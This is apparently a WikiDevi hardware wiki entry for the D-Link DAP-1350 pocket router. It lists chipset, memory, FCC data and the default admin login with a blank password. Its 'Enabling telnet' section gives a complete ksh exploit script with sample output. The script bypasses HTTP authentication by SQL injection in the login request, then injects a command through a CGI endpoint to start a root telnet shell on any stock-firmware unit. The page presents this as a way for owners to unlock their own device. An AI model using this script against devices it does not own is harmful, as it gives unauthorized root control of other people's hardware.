D-Link DAP-1350 rev A1

From WikiDevi.Wi-Cat.RU
Jump to navigation Jump to search

D-Link DAP-1350 A1
Availability: now

Manuf (OEM/ODM): Cameo

FCC approval date: 15 September 2009
Country of manuf.: China

Amazon image

ASIN
B003Q9AZHU (Flag of the United States.svg, On Amazon, On CCC)
multiple revisions of this device, use caution

Type: wireless router, access point

FCC ID: KA2AP1350A1
IC ID: 4216A-AP1350

Power: 5 VDC, 2.5 A
Connector type: barrel

CPU1: Ralink RT3052 (384 MHz)
FLA1: 8 MiB8,388,608 B <br />65,536 Kib <br />8,192 KiB <br />64 Mib <br />0.00781 GiB <br /> (Macronix MX29LV640EBTI-70G)
RAM1: 32 MiB33,554,432 B <br />262,144 Kib <br />32,768 KiB <br />256 Mib <br />0.0313 GiB <br /> (ESMT M12L128168A-7T × 2)

Expansion IFs: USB 2.0
USB ports: 1

WI1 chip1: Ralink RT3052
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: none

ETH chip1: Ralink RT3052
LAN speed: 100M
LAN ports: 1

bgn

Stock FW OS: Linux

TPFirmware supported: OpenWrt • (List | Dev | DLs)

Default SSID: dlink (38 addl. devices)
Default IP address: 192.168.0.50
the IP 192.168.0.50 is used by 63 additional devices
of which 63 are D-Link devices
Default login user: admin
Default login password: blank
admin:blank credentials used by 344 additional devices
of which 180 are D-Link devices

802dot11 OUI: 00:18:E7 (10 E, 21 W)
Ethernet OUI: 00:18:E7 (10 E, 21 W)

For a list of all currently documented Ralink chipsets with specifications, see Ralink.


Wireless N Pocket Router & Access Point

Product page • Interface emulator

Forum threads

OpenWRT trunk contains support for the DAP-1350, however, the 12.09-beta is broken.
You can build your own firmware now or wait for the Attitude Adjustment release.

Enabling telnet

A vulnerability was discovered in the stock firmware which allows arbitrary commands to be executed as root using HTTP POST requests to a CGI program.

A secondary SQL injection vulnerability also exists allowing one to bypass HTTP authentication.

 • telnet
#!/bin/ksh

# DAP-1350 telnetd, by brynet.
# This effect all stock firmware images for the device.
# Tested on OpenBSD.

host=$1
if [ $# -ne 1 ]; then
	echo "usage: $0 host or ip"
	exit 1;
fi
base_req="POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n"\
"Host: ${host}\r\nConnection: keep-alive\r\n"\
"Content-Type: application/x-www-form-urlencoded\r\n"

# user_name=admin
# user_pwd=';select 1;--
login_cmd="request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ"
login_clen="Content-Length: $(echo -n ${login_cmd} | wc -c)\r\n\r\n"
login_req="${base_req}${login_clen}${login_cmd}"

echo $login_req | nc $host 80 | grep default > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Authenticated."
else
	echo "Failed."
	exit 1;
fi
telnetd_cmd="request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh"
telnetd_clen="Content-Length: $(echo -n ${telnetd_cmd} | wc -c)\r\n\r\n"
telnetd_req="${base_req}${telnetd_clen}${telnetd_cmd}"

echo $telnetd_req | nc $host 80 > /dev/null 2>&1
sleep 2; nc -z $host 23 > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Root shell, okey doke."
	telnet $host
else
	echo "No root.. sorry, heh."
	exit 1;
fi

Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary.

    $ ./exploit.sh dlinkap # 192.168.0.50
    Authenticated.
    Root shell, okey doke.
    Trying 192.168.0.50...
    Connected to dlinkap.
    Escape character is '^]'.
    ... motd/etc.
    #

The factory set root password is unknown, so no login(1) process is started.
You must run the exploit script each time the device is powered on.